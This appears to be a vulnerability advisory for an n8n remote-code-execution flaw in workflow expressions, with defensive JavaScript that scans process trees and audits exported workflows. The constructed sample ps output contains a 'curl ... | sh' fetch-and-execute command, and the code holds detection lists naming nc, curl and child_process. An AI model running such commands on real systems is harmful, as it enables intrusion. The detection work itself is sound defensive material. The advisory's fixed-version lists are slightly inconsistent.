Platform: nodejs
Component: n8n
Fixed in: 1.123.23, 2.0.1, 2.10.1, 1.123.22
CVE-2026-27577 describes a Remote Code Execution (RCE) vulnerability discovered in n8n, a workflow automation platform. It allows an authenticated user with permission to create or modify workflows to execute arbitrary operating-system commands on the host running n8n, with the privileges of the n8n process. The vulnerability affects versions prior to 2.10.1, 2.9.3, and 1.123.22; a patch is available.
An attacker exploiting this vulnerability gains code execution as the n8n service account, which in most deployments amounts to complete control over the n8n server: installing malware, reading the data and the stored third-party credentials the instance handles, and pivoting to other systems reachable from it. The attack vector involves crafting malicious expressions within workflow parameters which, when evaluated by n8n, trigger the execution of arbitrary system commands. This is similar in concept to previous expression evaluation vulnerabilities in n8n (CVE-2025-68613), highlighting a recurring risk in this area of the application. The blast radius extends to any data processed by the affected n8n instance, as well as any systems accessible from the compromised server.
This vulnerability was publicly disclosed on 2026-02-25. The severity is CRITICAL (CVSS 9.9). There is no indication that it has been added to the CISA KEV catalog at this time. Public proof-of-concept exploits are not yet widely available, but the nature of the vulnerability suggests that they are likely to emerge. Given the ease of exploitation once a PoC is available, organizations should prioritize patching.
Organizations heavily reliant on n8n for workflow automation, particularly those with complex workflows or many users holding workflow creation/modification privileges, are at significant risk. Shared or multi-tenant n8n instances are particularly exposed, because all tenants share one n8n process and host: a single compromised or malicious account with editor rights can reach every other tenant's workflows, credentials and data.
• nodejs: Monitor n8n's own logs for workflow executions that error out or behave unusually around expression evaluation. Check for unexpected child processes: pstree -ap $(pgrep -o -f n8n) shows the process tree under the n8n process; helper node processes (for example task runners) are expected there, while shells, curl, wget or script interpreters spawned by n8n are not.
• generic web: Access logs rarely capture request bodies, so where a WAF or reverse proxy does log them, examine workflow create/update requests for parameter values containing suspicious tokens inside expressions (references to process, require, child_process, constructor or __proto__); otherwise audit the stored workflows directly. Use curl -I <n8n_url>/ to confirm whether the instance is reachable from networks it should not be exposed to.
• linux / server: Use journalctl -u n8n (if n8n runs as a systemd unit; for containers, docker logs <container>) to filter for errors or unusual activity around workflow execution. Add auditd rules that record execve calls made by the n8n service account and writes to its data directory (~/.n8n by default), so that command execution triggered from a workflow leaves an audit trail independent of n8n's own logging.
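The process-tree check from the first bullet, as an added example that is not part of the original page or of n8n's code base: it parses the output of ps -eo pid,ppid,user,comm,args and flags every process that descends (at any depth) from an n8n process and whose command name is a shell, download tool or interpreter. The list of suspicious command names and the sample ps output are constructed for illustration; the regex used to recognise the n8n parent process is an assumption about how the service is typically launched (node .../bin/n8n start).

```javascript
// Added example, not n8n's own code. Flag shells/downloaders/interpreters whose
// ancestor is the n8n process. Command list and SAMPLE_PS are constructed.

const SUSPICIOUS_COMM = new Set([
  'sh', 'bash', 'dash', 'zsh', 'curl', 'wget', 'nc', 'ncat',
  'python', 'python3', 'perl', 'base64',
]);

// Constructed sample of `ps -eo pid,ppid,user,comm,args`: the n8n service (pid 812)
// has a legitimate task-runner child (840) and a malicious `sh -c curl ... | sh` (913).
const SAMPLE_PS = `
  PID  PPID USER     COMMAND  COMMAND
    1     0 root     systemd  /sbin/init
  812     1 n8n      node     /usr/local/bin/node /usr/local/lib/node_modules/n8n/bin/n8n start
  840   812 n8n      node     /usr/local/bin/node /usr/local/lib/node_modules/@n8n/task-runner/dist/start.js
  913   812 n8n      sh       sh -c curl -s http://203.0.113.10/x.sh | sh
  914   913 n8n      curl     curl -s http://203.0.113.10/x.sh
  920     1 alice    bash     -bash
`;

// Parse ps output into {pid, ppid, user, comm, args} records; the header line is skipped.
function parsePs(text) {
  return text.trim().split('\n').slice(1).map((line) => {
    const m = line.trim().match(/^(\d+)\s+(\d+)\s+(\S+)\s+(\S+)\s+(.*)$/);
    return m ? { pid: +m[1], ppid: +m[2], user: m[3], comm: m[4], args: m[5] } : null;
  }).filter(Boolean);
}

// Assumption: the n8n main process is either named n8n or runs a path ending in `/n8n`.
function isN8nProcess(p) {
  return p.comm === 'n8n' || /(^|[\s/])n8n(\s|$)/.test(p.args);
}

// Return processes with a suspicious command name that have an n8n ancestor.
function findSuspiciousN8nChildren(procs) {
  const byPid = new Map(procs.map((p) => [p.pid, p]));
  const descendsFromN8n = (p) => {
    const seen = new Set();
    for (let cur = byPid.get(p.ppid); cur && !seen.has(cur.pid); cur = byPid.get(cur.ppid)) {
      seen.add(cur.pid);
      if (isN8nProcess(cur)) return true;
    }
    return false;
  };
  return procs.filter((p) => !isN8nProcess(p) && SUSPICIOUS_COMM.has(p.comm) && descendsFromN8n(p));
}

// Run the same check against the live system (requires ps(1) with these columns).
function scanLiveSystem() {
  const { execSync } = require('node:child_process');
  return findSuspiciousN8nChildren(parsePs(execSync('ps -eo pid,ppid,user,comm,args', { encoding: 'utf8' })));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of findSuspiciousN8nChildren(parsePs(SAMPLE_PS))) {
    console.log(`suspicious: pid=${p.pid} ppid=${p.ppid} user=${p.user} ${p.args}`);
  }
}
```

On the sample this reports pids 913 and 914 and leaves the task-runner child alone. Call scanLiveSystem() from a cron job or a monitoring agent to get the same result for the real host; tune SUSPICIOUS_COMM to whatever your workflows legitimately execute (for example via the Execute Command node) to keep the alert list meaningful.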
EPSS: 0.13% (33rd percentile)
The primary mitigation for CVE-2026-27577 is to upgrade n8n to version 2.10.1, 2.9.3, or 1.123.22 or later. If immediate upgrading is not possible, restrict workflow creation and modification to the smallest set of trusted users; this shrinks the attack surface but does not remove the flaw, since every remaining editor can still trigger it. Review existing workflows for suspicious expressions: references to process, require, child_process, constructor or __proto__ inside {{ }} segments are not needed by ordinary workflows, and an instance where such expressions are found should be treated as potentially compromised. A WAF or proxy cannot reliably prevent this vulnerability, because the malicious workflow is saved by an authenticated user through the normal API, but it can log and block obviously malicious requests. After upgrading, confirm the fix in a non-production instance by creating a workflow with a deliberately malicious expression (e.g., one that attempts to list files) and verifying that it is rejected or fails to evaluate rather than running the command.
Update n8n to version 2.10.1, 2.9.3 or 1.123.22, or later. If the update is not immediately possible, limit workflow creation and editing permissions to trusted users and/or deploy n8n in a hardened environment with restricted operating-system privileges and network access.
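The workflow review recommended above, as an added example that is not part of the original page or of n8n's code base: it walks the parameters of every node in an exported n8n workflow, picks out expression parameters (n8n stores these as strings beginning with "=" that embed {{ ... }} segments) and reports any segment that reaches for Node internals or prototype chains. The pattern list is this example's own review heuristic, not a vendor signature for the CVE, and the sample workflow is constructed; $env is flagged as well because it reads the process environment, even though n8n supports it as a feature.

```javascript
// Added example, not n8n's own code: audit exported workflow JSON for expressions
// that touch Node internals. Patterns are a review heuristic; SAMPLE_WORKFLOW is constructed.

const RISKY_PATTERNS = [
  { label: 'process/require access', re: /\b(process|require|module|global|globalThis)\b/ },
  { label: 'child_process module', re: /child_process/ },
  { label: 'prototype walk', re: /\b(constructor|__proto__|prototype)\b/ },
  { label: 'dynamic code', re: /\b(eval|Function|import)\s*\(/ },
  { label: 'environment read', re: /\$env\b/ },
];

// Constructed sample in n8n's export shape (only the fields the audit uses).
const SAMPLE_WORKFLOW = {
  name: 'constructed sample',
  nodes: [
    { name: 'Webhook', type: 'n8n-nodes-base.webhook', parameters: { path: 'orders' } },
    { name: 'Set', type: 'n8n-nodes-base.set', parameters: { assignments: { assignments: [
      { name: 'total', value: '={{ $json.price * $json.qty }}' },   // benign
      { name: 'home', value: '={{ $env.HOME }}' },                   // environment read
    ] } } },
    { name: 'HTTP Request', type: 'n8n-nodes-base.httpRequest',
      parameters: { url: '={{ process.env.HOME }}' } },              // process access
    { name: 'Rename', type: 'n8n-nodes-base.set',
      parameters: { value: '={{ $json.__proto__.constructor }}' } }, // prototype walk
  ],
};

// Return the bodies of all {{ ... }} segments in an expression string.
function expressionSegments(value) {
  const out = [];
  const re = /\{\{([\s\S]*?)\}\}/g;
  let m;
  while ((m = re.exec(value)) !== null) out.push(m[1].trim());
  return out;
}

// Depth-first walk over a parameters object, calling visit(path, string) for every string leaf.
function walkStrings(obj, path, visit) {
  if (typeof obj === 'string') { visit(path, obj); return; }
  if (Array.isArray(obj)) {
    obj.forEach((v, i) => walkStrings(v, `${path}[${i}]`, visit));
  } else if (obj && typeof obj === 'object') {
    for (const [k, v] of Object.entries(obj)) walkStrings(v, path ? `${path}.${k}` : k, visit);
  }
}

// One finding per (node, parameter path, matched pattern).
function auditWorkflow(workflow) {
  const findings = [];
  for (const node of workflow.nodes || []) {
    walkStrings(node.parameters || {}, '', (path, value) => {
      if (!value.startsWith('=')) return;               // only expression parameters
      for (const snippet of expressionSegments(value)) {
        for (const { label, re } of RISKY_PATTERNS) {
          if (re.test(snippet)) findings.push({ node: node.name, type: node.type, path, label, snippet });
        }
      }
    });
  }
  return findings;
}

// CLI: `node audit.js exported.json ...`; an export made with --all is an array of workflows.
if (typeof require !== 'undefined' && require.main === module) {
  const fs = require('node:fs');
  const files = process.argv.slice(2);
  const inputs = files.length
    ? files.flatMap((f) => { const d = JSON.parse(fs.readFileSync(f, 'utf8')); return Array.isArray(d) ? d : [d]; })
    : [SAMPLE_WORKFLOW];
  for (const wf of inputs) {
    for (const f of auditWorkflow(wf)) console.log(`[${wf.name}] ${f.node} (${f.path}): ${f.label}: ${f.snippet}`);
  }
}
```

Export the instance's workflows with n8n export:workflow --all --output=<file> and feed the file to the script; three findings come back for the sample, and the benign arithmetic expression is not reported. Findings are review leads, not proof of compromise: a legitimate $env lookup will show up too, which is why the output carries the node name and parameter path so a reviewer can open exactly that field.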
CVE-2026-27577 is a critical Remote Code Execution vulnerability in n8n, allowing authenticated users to execute system commands through crafted workflow expressions.
You are affected if you are running n8n versions prior to 2.10.1, 2.9.3, or 1.123.22. Assess your n8n deployment immediately.
Upgrade n8n to version 2.10.1, 2.9.3, or 1.123.22 or later. As a temporary workaround, restrict user permissions to prevent workflow modification.
While no active exploitation has been publicly confirmed, the vulnerability's severity and ease of exploitation suggest it is likely to be targeted.
Refer to the n8n security advisories on their GitHub repository: https://github.com/n8n-io/n8n/security/advisories